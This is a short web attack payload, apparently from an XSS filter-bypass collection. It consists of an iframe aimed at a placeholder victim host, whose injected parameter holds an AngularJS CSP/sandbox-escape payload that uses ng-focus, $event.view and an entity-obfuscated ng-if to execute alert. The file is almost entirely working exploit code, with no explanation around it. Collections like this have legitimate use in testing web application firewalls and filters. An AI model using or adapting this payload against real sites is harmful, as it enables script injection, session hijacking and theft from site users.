<iframe src="//victim.example.com/repo/waf/modsecurity/repo/filters/chrome/angular.php?inj=<?php
$payload = <<<'PAYLOAD'
<div ng-app ng-csp>
  <div ng-focus="x=$event" id=f tabindex=0>foo</div>
  <div ng-repeat="(key, value) in x.view">
    <div class="ng-&#x69;f: key=='window'">{{ value.alert = [1].reduce(value.alert, 1337) }}
  </div>
</div>
PAYLOAD;
echo rawurlencode($payload);
?>#f"></iframe>
